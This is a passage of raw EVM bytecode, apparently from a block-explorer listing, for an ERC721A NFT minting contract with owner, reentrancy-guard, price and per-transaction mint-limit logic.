1905060005b85811015612a0b57818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a483156129f6576129b66000888488612440565b6129f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129ec906135ec565b60405180910390fd5b5b8180600101925050808060010191505061293f565b508060008190555050612a21600086838761266f565b5050505050565b828054612a3490613942565b90600052602060002090601f016020900481019282612a565760008555612a9d565b82601f10612a6f57805160ff1916838001178555612a9d565b82800160010185558215612a9d579182015b82811115612a9c578251825591602001919060010190612a81565b5b509050612aaa9190612ae8565b5090565b6040518060400160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681525090565b5b80821115612b01576000816000905550600101612ae9565b5090565b6000612b18612b138461372c565b613707565b905082815260208101848484011115612b3457612b33613a37565b5b612b3f848285613900565b509392505050565b6000612b5a612b558461375d565b613707565b905082815260208101848484011115612b7657612b75613a37565b5b612b81848285613900565b509392505050565b600081359050612b98816140b8565b92915050565b600081359050612bad816140cf565b92915050565b600081359050612bc2816140e6565b92915050565b600081519050612bd7816140e6565b92915050565b600082601f830112612bf257612bf1613a32565b5b8135612c02848260208601612b05565b91505092915050565b600082601f830112612c2057612c1f613a32565b5b8135612c30848260208601612b47565b91505092915050565b600081359050612c48816140fd565b92915050565b600060208284031215612c6457612c63613a41565b5b6000612c7284828501612b89565b91505092915050565b60008060408385031215612c9257612c91613a41565b5b6000612ca085828601612b89565b9250506020612cb185828601612b89565b9150509250929050565b600080600060608486031215612cd457612cd3613a41565b5b6000612ce286828701612b89565b9350506020612cf386828701612b89565b9250506040612d0486828701612c39565b9150509250925092565b60008060008060808587031215612d2857612d27613a41565b5b6000612d3687828801612b89565b9450506020612d4787828801612b89565b9350506040612d5887828801612c39565b925050606085013567ffffffffffffffff811115612d7957612d78613a3c565b5b612d8587828801612bdd565b91505092959194509250565b60008060408385031215612da857612da7613a41565b5b6000612db685828601612b89565b9250506020612dc785828601612b9e565b9150509250929050565b60008060408385031215612de857612de7613a41565b5b6000612df685828601612b89565b9250506020612e0785828601612c39565b9150509250929050565b600060208284031215612e2757612e26613a41565b5b6000612e3584828501612bb3565b91505092915050565b600060208284031215612e5457612e53613a41565b5b6000612e6284828501612bc8565b91505092915050565b600060208284031215612e8157612e80613a41565b5b600082013567ffffffffffffffff811115612e9f57612e9e613a3c565b5b612eab84828501612c0b565b91505092915050565b600060208284031215612eca57612ec9613a41565b5b6000612ed884828501612c39565b91505092915050565b612eea8161388c565b82525050565b612ef98161389e565b82525050565b6000612f0a8261378e565b612f1481856137a4565b9350612f2481856020860161390f565b612f2d81613a46565b840191505092915050565b6000612f4382613799565b612f4d81856137c0565b9350612f5d81856020860161390f565b612f6681613a46565b840191505092915050565b6000612f7c82613799565b612f8681856137d1565b9350612f9681856020860161390f565b80840191505092915050565b6000612faf6022836137c0565b9150612fba82613a57565b604082019050919050565b6000612fd26007836137c0565b9150612fdd82613aa6565b602082019050919050565b6000612ff56026836137c0565b915061300082613acf565b604082019050919050565b6000613018602a836137c0565b915061302382613b1e565b604082019050919050565b600061303b6023836137c0565b915061304682613b6d565b604082019050919050565b600061305e6025836137c0565b915061306982613bbc565b604082019050919050565b60006130816039836137c0565b915061308c82613c0b565b604082019050919050565b60006130a4602b836137c0565b91506130af82613c5a565b604082019050919050565b60006130c76026836137c0565b91506130d282613ca9565b604082019050919050565b60006130ea6020836137c0565b91506130f582613cf8565b602082019050919050565b600061310d602f836137c0565b915061311882613d21565b604082019050919050565b6000613130601a836137c0565b915061313b82613d70565b602082019050919050565b60006131536032836137c0565b915061315e82613d99565b604082019050919050565b6000613176601d836137c0565b915061318182613de8565b602082019050919050565b60006131996022836137c0565b91506131a482613e11565b604082019050919050565b60006131bc6000836137b5565b91506131c782613e60565b600082019050919050565b60006131df6010836137c0565b91506131ea82613e63565b602082019050919050565b60006132026033836137c0565b915061320d82613e8c565b604082019050919050565b60006132256021836137c0565b915061323082613edb565b604082019050919050565b60006132486028836137c0565b915061325382613f2a565b604082019050919050565b600061326b6013836137c0565b915061327682613f79565b602082019050919050565b600061328e602e836137c0565b915061329982613fa2565b604082019050919050565b60006132b1601f836137c0565b91506132bc82613ff1565b602082019050919050565b60006132d4602f836137c0565b91506132df8261401a565b604082019050919050565b60006132f7602d836137c0565b915061330282614069565b604082019050919050565b613316816138f6565b82525050565b60006133288284612f71565b915081905092915050565b600061333e826131af565b9150819050919050565b600060208201905061335d6000830184612ee1565b92915050565b60006080820190506133786000830187612ee1565b6133856020830186612ee1565b613392604083018561330d565b81810360608301526133a48184612eff565b905095945050505050565b60006020820190506133c46000830184612ef0565b92915050565b600060208201905081810360008301526133e48184612f38565b905092915050565b6000602082019050818103600083015261340581612fa2565b9050919050565b6000602082019050818103600083015261342581612fc5565b9050919050565b6000602082019050818103600083015261344581612fe8565b9050919050565b600060208201905081810360008301526134658161300b565b9050919050565b600060208201905081810360008301526134858161302e565b9050919050565b600060208201905081810360008301526134a581613051565b9050919050565b600060208201905081810360008301526134c581613074565b9050919050565b600060208201905081810360008301526134e581613097565b9050919050565b60006020820190508181036000830152613505816130ba565b9050919050565b60006020820190508181036000830152613525816130dd565b9050919050565b6000602082019050818103600083015261354581613100565b9050919050565b6000602082019050818103600083015261356581613123565b9050919050565b6000602082019050818103600083015261358581613146565b9050919050565b600060208201905081810360008301526135a581613169565b9050919050565b600060208201905081810360008301526135c58161318c565b9050919050565b600060208201905081810360008301526135e5816131d2565b9050919050565b60006020820190508181036000830152613605816131f5565b9050919050565b6000602082019050818103600083015261362581613218565b9050919050565b600060208201905081810360008301526136458161323b565b9050919050565b600060208201905081810360008301526136658161325e565b9050919050565b6000602082019050818103600083015261368581613281565b9050919050565b600060208201905081810360008301526136a5816132a4565b9050919050565b600060208201905081810360008301526136c5816132c7565b9050919050565b600060208201905081810360008301526136e5816132ea565b9050919050565b6000602082019050613701600083018461330d565b92915050565b6000613711613722565b905061371d8282613974565b919050565b6000604051905090565b600067ffffffffffffffff82111561374757613746613a03565b5b61375082613a46565b9050602081019050919050565b600067ffffffffffffffff82111561377857613777613a03565b5b61378182613a46565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600081905092915050565b600082825260208201905092915050565b600081905092915050565b60006137e7826138f6565b91506137f2836138f6565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115613827576138266139a5565b5b828201905092915050565b600061383d826138f6565b9150613848836138f6565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615613881576138806139a5565b5b828202905092915050565b6000613897826138d6565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b82818337600083830152505050565b60005b8381101561392d578082015181840152602081019050613912565b8381111561393c576000848401525b50505050565b6000600282049050600182168061395a57607f821691505b6020821081141561396e5761396d6139d4565b5b50919050565b61397d82613a46565b810181811067ffffffffffffffff8211171561399c5761399b613a03565b5b80604052505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f455243373231413a206f776e657220696e646578206f7574206f6620626f756e60008201527f6473000000000000000000000000000000000000000000000000000000000000602082015250565b7f4e6f206d6f726500000000000000000000000000000000000000000000000000600082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f455243373231413a206f776e657220717565727920666f72206e6f6e6578697360008201527f74656e7420746f6b656e00000000000000000000000000000000000000000000602082015250565b7f455243373231413a20676c6f62616c20696e646578206f7574206f6620626f7560008201527f6e64730000000000000000000000000000000000000000000000000000000000602082015250565b7f455243373231413a207472616e7366657220746f20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60008201527f776e6572206e6f7220617070726f76656420666f7220616c6c00000000000000602082015250565b7f455243373231413a2062616c616e636520717565727920666f7220746865207a60008201527f65726f2061646472657373000000000000000000000000000000000000000000602082015250565b7f455243373231413a207472616e736665722066726f6d20696e636f727265637460008201527f206f776e65720000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f4552433732314d657461646174613a2055524920717565727920666f72206e6f60008201527f6e6578697374656e7420746f6b656e0000000000000000000000000000000000602082015250565b7f455243373231413a20617070726f766520746f2063616c6c6572000000000000600082015250565b7f455243373231413a207472616e736665722063616c6c6572206973206e6f742060008201527f6f776e6572206e6f7220617070726f7665640000000000000000000000000000602082015250565b7f506c656173652073656e642074686520657861637420616d6f756e742e000000600082015250565b7f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60008201527f6572000000000000000000000000000000000000000000000000000000000000602082015250565b50565b7f5472616e73666572206661696c65642e00000000000000000000000000000000600082015250565b7f455243373231413a207472616e7366657220746f206e6f6e204552433732315260008201527f6563656976657220696d706c656d656e74657200000000000000000000000000602082015250565b7f455243373231413a206d696e7420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f455243373231413a207175616e74697479206d7573742062652067726561746560008201527f72207468616e2030000000000000000000000000000000000000000000000000602082015250565b7f4d61782070657220545820726561636865642e00000000000000000000000000600082015250565b7f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060008201527f6f776e657220627920696e646578000000000000000000000000000000000000602082015250565b7f5265656e7472616e637947756172643a207265656e7472616e742063616c6c00600082015250565b7f455243373231413a20756e61626c6520746f2064657465726d696e652074686560008201527f206f776e6572206f6620746f6b656e0000000000000000000000000000000000602082015250565b7f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560008201527f78697374656e7420746f6b656e00000000000000000000000000000000000000602082015250565b6140c18161388c565b81146140cc57600080fd5b50565b6140d88161389e565b81146140e357600080fd5b50565b6140ef816138aa565b81146140fa57600080fd5b50565b614106816138f6565b811461411157600080fd5b5056fea2646970667358221220edfdae68197c3e081029f571415be0f950bbd4d2be28561477de3b71dc5c7d3864736f6c6343000807003368747470733a2f2f676174657761792e70696e6174612e636c6f75642f697066732f516d5a425147426379784c57347347325a39765554454264736764643241475535316433554c536a39664b624632

Deployed Bytecode

0x6080604052600436106101cd5760003560e01c80638961821b116100f7578063a22cb46511610095578063d5abeb0111610064578063d5abeb0114610667578063e985e9c514610692578063f2fde38b146106cf578063f968adbe146106f8576101cd565b8063a22cb465146105ad578063b88d4fde146105d6578063c7c39ffc146105ff578063c87b56dd1461062a576101cd565b806395d89b41116100d157806395d89b4114610512578063a035b1fe1461053d578063a0712d6814610568578063a0bcfc7f14610584576101cd565b80638961821b146104955780638da5cb5b146104be57806391b7f5ed146104e9576101cd565b8063333e44e61161016f5780636352211e1161013e5780636352211e146103d95780636c0360eb1461041657806370a0823114610441578063715018a61461047e576101cd565b8063333e44e6146103315780633ccfd60b1461035c57806342842e0e146103735780634f6ccce71461039c576101cd565b8063095ea7b3116101ab578063095ea7b31461027757806318160ddd146102a057806323b872dd146102cb5780632f745c59146102f4576101cd565b806301ffc9a7146101d257806306fdde031461020f578063081812fc1461023a575b600080fd5b3480156101de57600080fd5b506101f960048036038101906101f49190612e11565b610723565b60405161020691906133af565b60405180910390f35b34801561021b57600080fd5b5061022461086d565b60405161023191906133ca565b60405180910390f35b34801561024657600080fd5b50610261600480360381019061025c9190612eb4565b6108ff565b60405161026e9190613348565b60405180910390f35b34801561028357600080fd5b5061029e60048036038101906102999190612dd1565b610984565b005b3480156102ac57600080fd5b506102b5610a9d565b6040516102c291906136ec565b60405180910390f35b3480156102d757600080fd5b506102f260048036038101906102ed9190612cbb565b610aa6565b005b34801561030057600080fd5b5061031b60048036038101906103169190612dd1565b610ab6565b60405161032891906136ec565b60405180910390f35b34801561033d57600080fd5b50610346610ca8565b60405161035391906136ec565b60405180910390f35b34801561036857600080fd5b50610371610cae565b005b34801561037f57600080fd5b5061039a60048036038101906103959190612cbb565b610e8e565b005b3480156103a857600080fd5b506103c360048036038101906103be9190612eb4565b610eae565b6040516103d091906136ec565b60405180910390f35b3480156103e557600080fd5b5061040060048036038101906103fb9190612eb4565b610f01565b60405161040d9190613348565b60405180910390f35b34801561042257600080fd5b5061042b610f17565b60405161043891906133ca565b60405180910390f35b34801561044d57600080fd5b5061046860048036038101906104639190612c4e565b610fa5565b60405161047591906136ec565b60405180910390f35b34801561048a57600080fd5b5061049361108e565b005b3480156104a157600080fd5b506104bc60048036038101906104b79190612dd1565b611175565b005b3480156104ca57600080fd5b506104d361125e565b6040516104e09190613348565b60405180910390f35b3480156104f557600080fd5b50610510600480360381019061050b9190612eb4565b611288565b005b34801561051e57600080fd5b5061052761136d565b60405161053491906133ca565b60405180910390f35b34801561054957600080fd5b506105526113ff565b60405161055f91906136ec565b60405180910390f35b610582600480360381019061057d9190612eb4565b611405565b005b34801561059057600080fd5b506105ab60048036038101906105a69190612e6b565b6115e5565b005b3480156105b957600080fd5b506105d460048036038101906105cf9190612d91565b6116da565b005b3480156105e257600080fd5b506105fd60048036038101906105f89190612d0e565b61185b565b005b34801561060b57600080fd5b506106146118b7565b60405161062191906136ec565b60405180910390f35b34801561063657600080fd5b50610651600480360381019061064c9190612eb4565b6118bd565b60405161065e91906133ca565b60405180910390f35b34801561067357600080fd5b5061067c61195a565b60405161068991906136ec565b60405180910390f35b34801561069e57600080fd5b506106b960048036038101906106b49190612c7b565b611960565b6040516106c691906133af565b60405180910390f35b3480156106db57600080fd5b506106f660048036038101906106f19190612c4e565b6119f4565b005b34801561070457600080fd5b5061070d611b4b565b60405161071a91906136ec565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806107ee57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b8061085657507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610866575061086582611b51565b5b9050919050565b60606001805461087c90613942565b80601f01602080910402602001604051908101604052809291908181526020018280546108a890613942565b80156108f55780601f106108ca576101008083540402835291602001916108f5565b820191906000526020600020905b8154815290600101906020018083116108d857829003601f168201915b5050505050905090565b600061090a82611bbb565b610949576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610940906136cc565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b600061098f82610f01565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a00576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f7906135ac565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610a1f611bc8565b73ffffffffffffffffffffffffffffffffffffffff161480610a4e5750610a4d81610a48611bc8565b611960565b5b610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a84906134ac565b60405180910390fd5b610a98838383611bd0565b505050565b60008054905090565b610ab1838383611c82565b505050565b6000610ac183610fa5565b8210610b02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af9906133ec565b60405180910390fd5b6000610b0c610a9d565b905060008060005b83811015610c66576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610c0657806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c585786841415610c4f578195505050505050610ca2565b83806001019450505b508080600101915050610b14565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c999061366c565b60405180910390fd5b92915050565b600e5481565b610cb6611bc8565b73ffffffffffffffffffffffffffffffffffffffff16610cd461125e565b73ffffffffffffffffffffffffffffffffffffffff161480610d4a5750610cf9611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d809061350c565b60405180910390fd5b60026009541415610dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc69061368c565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff1647604051610dfd90613333565b60006040518083038185875af1925050503d8060008114610e3a576040519150601f19603f3d011682016040523d82523d6000602084013e610e3f565b606091505b5050905080610e83576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e7a906135cc565b60405180910390fd5b506001600981905550565b610ea98383836040518060200160405280600081525061185b565b505050565b6000610eb8610a9d565b8210610ef9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef09061346c565b60405180910390fd5b819050919050565b6000610f0c826121c2565b600001519050919050565b600a8054610f2490613942565b80601f0160208091040260200160405190810160405280929190818152602001828054610f5090613942565b8015610f9d5780601f10610f7257610100808354040283529160200191610f9d565b820191906000526020600020905b815481529060010190602001808311610f8057829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611016576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100d906134cc565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b611096611bc8565b73ffffffffffffffffffffffffffffffffffffffff166110b461125e565b73ffffffffffffffffffffffffffffffffffffffff16148061112a57506110d9611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611169576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111609061350c565b60405180910390fd5b611173600061235c565b565b61117d611bc8565b73ffffffffffffffffffffffffffffffffffffffff1661119b61125e565b73ffffffffffffffffffffffffffffffffffffffff16148061121157506111c0611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611250576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112479061350c565b60405180910390fd5b61125a8282612422565b5050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b611290611bc8565b73ffffffffffffffffffffffffffffffffffffffff166112ae61125e565b73ffffffffffffffffffffffffffffffffffffffff16148061132457506112d3611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611363576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135a9061350c565b60405180910390fd5b80600b8190555050565b60606002805461137c90613942565b80601f01602080910402602001604051908101604052809291908181526020018280546113a890613942565b80156113f55780601f106113ca576101008083540402835291602001916113f5565b820191906000526020600020905b8154815290600101906020018083116113d857829003601f168201915b5050505050905090565b600b5481565b6000600b54905060006001600e5461141d91906137dc565b83611426610a9d565b61143091906137dc565b1080156114895750600d5483601060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461148691906137dc565b11155b905080156114ec576000915082601060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546114e491906137dc565b925050819055505b81836114f89190613832565b34101561153a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115319061358c565b60405180910390fd5b600f5483611546610a9d565b61155091906137dc565b1115611591576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115889061340c565b60405180910390fd5b600c548311156115d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115cd9061364c565b60405180910390fd5b6115e03384612422565b505050565b6115ed611bc8565b73ffffffffffffffffffffffffffffffffffffffff1661160b61125e565b73ffffffffffffffffffffffffffffffffffffffff1614806116815750611630611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6116c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116b79061350c565b60405180910390fd5b80600a90805190602001906116d6929190612a28565b5050565b6116e2611bc8565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611750576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117479061354c565b60405180910390fd5b806006600061175d611bc8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661180a611bc8565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c318360405161184f91906133af565b60405180910390a35050565b611866848484611c82565b61187284848484612440565b6118b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118a8906135ec565b60405180910390fd5b50505050565b600d5481565b60606118c882611bbb565b611907576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118fe9061352c565b60405180910390fd5b60006119116125d7565b905060008151116119315760405180602001604052806000815250611952565b80604051602001611942919061331c565b6040516020818303038152906040525b915050919050565b600f5481565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6119fc611bc8565b73ffffffffffffffffffffffffffffffffffffffff16611a1a61125e565b73ffffffffffffffffffffffffffffffffffffffff161480611a905750611a3f611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611acf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac69061350c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611b3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b369061342c565b60405180910390fd5b611b488161235c565b50565b600c5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b6000611c8d826121c2565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16611cb4611bc8565b73ffffffffffffffffffffffffffffffffffffffff161480611d105750611cd9611bc8565b73ffffffffffffffffffffffffffffffffffffffff16611cf8846108ff565b73ffffffffffffffffffffffffffffffffffffffff16145b80611d2c5750611d2b8260000151611d26611bc8565b611960565b5b905080611d6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d659061356c565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614611de0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd7906134ec565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415611e50576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e479061348c565b60405180910390fd5b611e5d8585856001612669565b611e6d6000848460000151611bd0565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415612152576120b181611bbb565b156121515782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46121bb858585600161266f565b5050505050565b6121ca612aae565b6121d382611bbb565b612212576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122099061344c565b60405180910390fd5b60008290505b6000811061231b576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff161461230c578092505050612357565b50808060019003915050612218565b506040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161234e906136ac565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b61243c828260405180602001604052806000815250612675565b5050565b60006124618473ffffffffffffffffffffffffffffffffffffffff16612687565b156125ca578373ffffffffffffffffffffffffffffffffffffffff1663150b7a0261248a611bc8565b8786866040518563ffffffff1660e01b81526004016124ac9493929190613363565b602060405180830381600087803b1580156124c657600080fd5b505af19250505080156124f757506040513d601f19601f820116820180604052508101906124f49190612e3e565b60015b61257a573d8060008114612527576040519150601f19603f3d011682016040523d82523d6000602084013e61252c565b606091505b50600081511415612572576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612569906135ec565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149150506125cf565b600190505b949350505050565b6060600a80546125e690613942565b80601f016020809104026020016040519081016040528092919081815260200182805461261290613942565b801561265f5780601f106126345761010080835404028352916020019161265f565b820191906000526020600020905b81548152906001019060200180831161264257829003601f168201915b5050505050905090565b50505050565b50505050565b61268283838360016126aa565b505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415612720576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127179061360c565b60405180910390fd5b6000841415612764576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161275b9061362c565b60405180910390fd5b6127716000868387612669565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b85811015612a0b57818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4831561